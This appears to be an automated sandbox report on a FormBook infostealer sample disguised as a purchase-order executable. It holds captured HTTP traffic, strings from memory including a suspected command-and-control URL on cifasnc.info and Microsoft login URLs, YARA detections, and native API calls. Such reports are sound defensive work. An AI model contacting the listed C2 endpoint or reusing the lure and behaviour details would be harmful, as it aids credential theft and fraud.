74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</s
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 23:44:30 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404">
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 15 Jan 2025 07:44:00 GMTContent-Type: text/htmlContent-Length: 166Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 15 Jan 2025 07:44:03 GMTContent-Type: text/htmlContent-Length: 166Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 15 Jan 2025 07:44:05 GMTContent-Type: text/htmlContent-Length: 166Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 15 Jan 2025 07:44:08 GMTContent-Type: text/htmlContent-Length: 0Connection: close
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 146Content-Type: text/htmlDate: Wed, 15 Jan 2025 23:44:58 GMTServer: nginxX-Cache: BYPASSConnection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 146Content-Type: text/htmlDate: Wed, 15 Jan 2025 23:45:01 GMTServer: nginxX-Cache: BYPASSConnection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 146Content-Type: text/htmlDate: Wed, 15 Jan 2025 23:45:04 GMTServer: nginxX-Cache: BYPASSConnection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 146Content-Type: text/htmlDate: Wed, 15 Jan 2025 23:45:06 GMTServer: nginxX-Cache: BYPASSConnection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 15 Jan 2025 23:45:18 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 23:45:26 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closex-pingback: http://cifasnc.info/xmlrpc.phpexpires: Wed, 11 Jan 1984 05:00:00 GMTlast-modified: Wed, 15 Jan 2025 23:45:26 GMTcache-control: no-cache, must-revalidate, max-age=0pragma: no-cachevary: Accept-Encoding,User-Agentx-turbo-charged-by: LiteSpeedcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T3ODdrmEbp6f%2BspjCzl3X4%2Bys0Sej6h6XmiebDMCONK13UdkFRmxkGF7pmDiWoXyDLSTjs18vKWrEiiciJEME%2Fr3xkz10kFsBz5totsCVJ0vbDmMttyLF3OQ3YMh0Nkovh8H"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9029bd4e8e3ed6bf-IADContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=6903&min_rtt=6903&rtt_var=3451&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=741&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 35 31 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 57 dd 6f dc 36 0c 7f ce 01 f9 1f 58 0d c8 b5 d8 7c 4e fa b1 15 ad ed a1 4b 1b ac 0f eb 82 a6 c5 b0 a7 41 67 d3 b6 16 59 52 24 f9 2e 07 ec 8f 1f 24 f9 f3 7a 4b ee 61 79 38 4b 24 c5 1f 49 91 14 93 3c 79 ff fb e5 97 3f af 3f 40 6d 1b 9e 2d 12 f7 81 82 e9 94 70 ab 09 70 2a aa 94 a0 88 be de 10 c7 45 5a 64 8b a4 41 4b 21 af a9 36 68 53 f2 f5 cb 55 f4 9a 40 9c 2d 12 cb 2c c7 ec 9a 56 08 42 5a 28 65 2b 0a f8 07 72 56 52 23 f2 15 13 a5 4c e2 20 b4 48 Data Ascii: 51eWo6X|NKAgYR$.$zKay8K$I<y??@m-pp*EZdAK!6hSU@-,VBZ(e+rVR#L H
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 23:45:29 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closex-pingback: http://cifasnc.info/xmlrpc.phpexpires: Wed, 11 Jan 1984 05:00:00 GMTlast-modified: Wed, 15 Jan 2025 23:45:29 GMTcache-control: no-cache, must-revalidate, max-age=0pragma: no-cachevary: Accept-Encoding,User-Agentx-turbo-charged-by: LiteSpeedcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Wfen66d5Jiu6XNLqcO2NeHKzgYo573pVgXmCAN%2F9fjUTNLg5hyMA0AJBzZ5CPpqFQ5jnFb4PP7xTuAHXb2ofurwCIgnY9E3UpAhGcdNhr2dwAcmni8RDNdIXy0eBWw1FUdFu"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9029bd610e65d660-IADContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=6994&min_rtt=6994&rtt_var=3497&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=765&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 35 31 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 57 dd 6f dc 36 0c 7f ce 01 f9 1f 58 0d c8 b5 d8 7c 4e fa b1 15 ad ed a1 4b 1b ac 0f eb 82 a6 c5 b0 a7 41 67 d3 b6 16 59 52 24 f9 2e 07 ec 8f 1f 24 f9 f3 7a 4b ee 61 79 38 4b 24 c5 1f 49 91 14 93 3c 79 ff fb e5 97 3f af 3f 40 6d 1b 9e 2d 12 f7 81 82 e9 94 70 ab 09 70 2a aa 94 a0 88 be de 10 c7 45 5a 64 8b a4 41 4b 21 af a9 36 68 53 f2 f5 cb 55 f4 9a 40 9c 2d 12 cb 2c c7 ec 9a 56 08 42 5a 28 65 2b 0a f8 07 72 56 52 23 f2 15 13 a5 4c e2 20 b4 48 38 13 b7 a0 Data Ascii: 51eWo6X|NKAgYR$.$zKay8K$I<y??@m-pp*EZdAK!6hSU@-,VBZ(e+rVR#L H8
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 23:45:32 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closex-pingback: http://cifasnc.info/xmlrpc.phpexpires: Wed, 11 Jan 1984 05:00:00 GMTlast-modified: Wed, 15 Jan 2025 23:45:32 GMTcache-control: no-cache, must-revalidate, max-age=0pragma: no-cachevary: Accept-Encoding,User-Agentx-turbo-charged-by: LiteSpeedcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lIxc5puVm%2BoM278R7tfSiIszsVGW6t6EIqKnksjKx%2B6NrxIzeOC7fTu1I3eMRbYmrfmuhu901LCw%2F2FHxEHeWyl%2BI5fCruwIxsAjWjIrVNE3ezdC95JFFu11RsNW%2BEk%2FJhFj"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9029bd717f24062c-IADContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=6838&min_rtt=6838&rtt_var=3419&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1778&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 35 31 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 57 dd 6f dc 36 0c 7f ce 01 f9 1f 58 0d c8 b5 d8 7c 4e fa b1 15 ad ed a1 4b 1b ac 0f eb 82 a6 c5 b0 a7 41 67 d3 b6 16 59 52 24 f9 2e 07 ec 8f 1f 24 f9 f3 7a 4b ee 61 79 38 4b 24 c5 1f 49 91 14 93 3c 79 ff fb e5 97 3f af 3f 40 6d 1b 9e 2d 12 f7 81 82 e9 94 70 ab 09 70 2a aa 94 a0 88 be de 10 c7 45 5a 64 8b a4 41 4b 21 af a9 36 68 53 f2 f5 cb 55 f4 9a 40 9c 2d 12 cb 2c c7 ec 9a 56 08 42 5a 28 65 2b 0a f8 07 72 56 52 23 f2 15 Data Ascii: 51eWo6X|NKAgYR$.$zKay8K$I<y??@m-pp*EZdAK!6hSU@-,VBZ(e+rVR#
              Source: fc.exe, 00000006.00000002.3983373594.00000000045A6000.00000004.10000000.00040000.00000000.sdmp, xVHAYGlJzfAqXG.exe, 00000008.00000002.3983097495.0000000003856000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://cifasnc.info/8rr3/?fVnx=iJ8hmWjdEFuk0u06tRtBw99RNA0cmJToU8wTtz6qpCRnWDAwsuGK654yLyD0CfrWg
              Source: fc.exe, 00000006.00000002.3983373594.00000000045A6000.00000004.10000000.00040000.00000000.sdmp, xVHAYGlJzfAqXG.exe, 00000008.00000002.3983097495.0000000003856000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://cifasnc.info/xmlrpc.php
              Source: xVHAYGlJzfAqXG.exe, 00000008.00000002.3985173271.0000000004AF0000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.cifasnc.info
              Source: xVHAYGlJzfAqXG.exe, 00000008.00000002.3985173271.0000000004AF0000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.cifasnc.info/8rr3/
              Source: fc.exe, 00000006.00000003.2712776546.0000000007884000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: fc.exe, 00000006.00000003.2712776546.0000000007884000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: fc.exe, 00000006.00000003.2712776546.0000000007884000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: fc.exe, 00000006.00000003.2712776546.0000000007884000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: fc.exe, 00000006.00000003.2712776546.0000000007884000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: fc.exe, 00000006.00000003.2712776546.0000000007884000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: fc.exe, 00000006.00000003.2712776546.0000000007884000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: fc.exe, 00000006.00000002.3983373594.0000000003DCC000.00000004.10000000.00040000.00000000.sdmp, xVHAYGlJzfAqXG.exe, 00000008.00000002.3983097495.000000000307C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:400
              Source: fc.exe, 00000006.00000002.3981631338.0000000002738000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
              Source: fc.exe, 00000006.00000002.3981631338.0000000002738000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
              Source: fc.exe, 00000006.00000003.2708264948.0000000007833000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
              Source: fc.exe, 00000006.00000002.3981631338.0000000002738000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2
              Source: fc.exe, 00000006.00000002.3981631338.0000000002738000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2s
              Source: fc.exe, 00000006.00000002.3981631338.0000000002738000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
              Source: fc.exe, 00000006.00000002.3981631338.0000000002738000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033a
              Source: fc.exe, 00000006.00000002.3981631338.0000000002738000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
              Source: fc.exe, 00000006.00000002.3981631338.0000000002738000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
              Source: fc.exe, 00000006.00000003.2712776546.0000000007884000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: fc.exe, 00000006.00000003.2712776546.0000000007884000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

              E-Banking Fraud

              barindex
              Yara detected FormBook
              Source: Yara matchFile source: 0.2.PO No. 0146850827805 HSP0059842.exe.b80000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.2514153337.0000000001480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2513741132.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.3982308756.0000000002970000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.3981444613.0000000000340000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.3985173271.0000000004A80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.3982249648.0000000002920000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2515425897.0000000001A70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.3982653238.00000000030F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_00BACB43 NtClose,0_2_00BACB43
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01582B60 NtClose,LdrInitializeThunk,0_2_01582B60
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01582DF0 NtQuerySystemInformation,LdrInitializeThunk,0_2_01582DF0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01582C70 NtFreeVirtualMemory,LdrInitializeThunk,0_2_01582C70
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_015835C0 NtCreateMutant,LdrInitializeThunk,0_2_015835C0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01584340 NtSetContextThread,0_2_01584340
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01584650 NtSuspendThread,0_2_01584650
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01582BF0 NtAllocateVirtualMemory,0_2_01582BF0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01582BE0 NtQueryValueKey,0_2_01582BE0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01582B80 NtQueryInformationFile,0_2_01582B80
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01582BA0 NtEnumerateValueKey,0_2_01582BA0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01582AD0 NtReadFile,0_2_01582AD0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01582AF0 NtWriteFile,0_2_01582AF0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01582AB0 NtWaitForSingleObject,0_2_01582AB0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01582D10 NtMapViewOfSection,0_2_01582D10
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01582D00 NtSetInformationFile,0_2_01582D00
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01582D30 NtUnmapViewOfSection,0_2_01582D30
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01582DD0 NtDelayExecution,0_2_01582DD0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01582DB0 NtEnumerateKey,0_2_01582DB0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01582C60 NtCreateKey,0_2_01582C60
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01582C00 NtQueryInformationProcess,0_2_01582C00
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP0059842.exeCode function: 0_2_01582CC0 NtQueryVirtualMemory,0_2_01582CC0
